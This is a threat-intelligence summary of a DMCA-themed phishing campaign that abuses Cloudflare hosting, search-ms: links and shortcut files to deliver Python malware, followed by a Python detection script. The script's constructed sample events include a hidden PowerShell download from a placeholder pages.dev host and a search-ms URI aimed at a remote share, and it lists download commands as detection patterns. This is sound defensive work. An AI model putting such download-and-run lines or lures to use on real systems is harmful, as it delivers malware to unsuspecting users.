Cybersecurity and Information Warfare

Russian-speaking Hackers Exploit Cloudflare Services for Sophisticated DMCA-themed Phishing Campaign

A Russian-speaking threat actor has been running a phishing campaign that abuses Cloudflare's Pages and Workers services to host lure pages disguised as Digital Millennium Copyright Act (DMCA) takedown notices. The lure leads victims to open a malicious Windows shortcut (.lnk) file delivered through the search-ms: protocol handler, which Windows Explorer uses to open a search view over a location the URI specifies. The shortcut runs a PowerShell script that downloads a ZIP archive containing Python-based malware, and that malware then checks in with Pyramid command-and-control (C2) servers.

More than 20 domains on Cloudflare's pages.dev and workers.dev have been identified. The operators frequently reuse file names while changing file contents to evade detection. Payloads are also staged on open directories hosted by Railnet LLC, a bulletproof hosting provider previously linked to malicious activity, and victims' IP addresses are reported to attacker-operated Telegram bots so the operators can track who has opened the lure.

The campaign shows the actor blending into legitimate Cloudflare infrastructure and adding obfuscation to the malware's configuration in order to stay undetected. Defenders should watch for abuse of protocol handlers such as search-ms: and of trusted hosting services in this context.
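The following is an added detection example, not code from the original article or from any vendor report. It turns the chain described above (search-ms: URI pointing at a remote location, Explorer spawning PowerShell that fetches from pages.dev or workers.dev, a Python interpreter running out of a user-writable directory) into three heuristics run over constructed process-creation events. The event schema, the sample hostnames and paths, and the "user-writable directory" heuristic are assumptions for illustration; the real campaign's file names and domains are not reproduced here.

```python
"""
Heuristics for the search-ms -> LNK -> PowerShell -> ZIP -> Python chain.
Added example, not code from the article or any vendor report. Event fields are
modelled loosely on a process-creation record (image, parent image, command
line); the sample events at the bottom are constructed, not captured telemetry.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Trusted hosting services the article reports being abused.
ABUSED_HOSTING = ("pages.dev", "workers.dev")

# search-ms: URIs can scope Explorer to a location via crumb=location:.
# A UNC (\\host\share) or http(s) location in that parameter means the lure is
# pointing Explorer at attacker-controlled content; a local path is normal use.
SEARCH_MS_RE = re.compile(r"search-ms:", re.IGNORECASE)
REMOTE_LOCATION_RE = re.compile(r"crumb=location:(\\\\|https?://)", re.IGNORECASE)

# Common PowerShell download primitives (assumed list, not from the article).
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget|start-bitstransfer)\b",
    re.IGNORECASE,
)
# Heuristic (assumption): a Python interpreter unpacked from a ZIP tends to live
# under a user-writable directory rather than a managed install location.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    cmdline: str        # command line as logged


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def search_ms_remote_location(ev: ProcEvent) -> bool:
    """search-ms: URI whose crumb=location points at a remote share or URL."""
    cmd = unquote(ev.cmdline)  # handle percent-encoded URIs
    return bool(SEARCH_MS_RE.search(cmd) and REMOTE_LOCATION_RE.search(cmd))


def explorer_spawned_downloader(ev: ProcEvent) -> bool:
    """Explorer (i.e. a clicked shortcut) launching PowerShell that downloads,
    or references an abused hosting domain."""
    if _basename(ev.image) not in SCRIPT_HOSTS or _basename(ev.parent_image) != "explorer.exe":
        return False
    cmd = unquote(ev.cmdline).lower()
    return any(d in cmd for d in ABUSED_HOSTING) or bool(DOWNLOAD_RE.search(cmd))


def python_from_user_writable_path(ev: ProcEvent) -> bool:
    """Python interpreter executing from a user-writable directory."""
    return _basename(ev.image) in ("python.exe", "pythonw.exe") and bool(
        USER_WRITABLE_RE.search(ev.image)
    )


RULES = [
    ("search_ms_remote", search_ms_remote_location),
    ("explorer_spawned_downloader", explorer_spawned_downloader),
    ("python_user_writable", python_from_user_writable_path),
]


def triage(events):
    """Return (event_index, rule_name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


# Constructed sample events. Hostnames, IPs (203.0.113.0/24 is documentation
# space) and paths are made up for the example.
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Program Files\\Browser\\browser.exe",
              '"C:\\Windows\\explorer.exe" "search-ms:query=DMCA_Notice&crumb=location:\\\\203.0.113.10@80\\DavWWWRoot"'),
    ProcEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\explorer.exe",
              'powershell.exe -w hidden -c "iwr https://example-notice.pages.dev/notice.zip -OutFile $env:TEMP\\notice.zip"'),
    ProcEvent("C:\\Users\\jdoe\\AppData\\Local\\Temp\\notice\\python.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "python.exe notice.pyc"),
    # Benign: admin script launched from a desktop shortcut.
    ProcEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\explorer.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
    # Benign: search-ms scoped to a local folder.
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\explorer.exe",
              '"C:\\Windows\\explorer.exe" "search-ms:query=report&crumb=location:C:\\Users\\jdoe\\Documents"'),
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule is weak on its own (an admin can legitimately run Invoke-WebRequest from a shortcut), so in practice the three are best correlated within one process tree and a short time window; the point of the example is the sequence the campaign produces, not any single string match.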
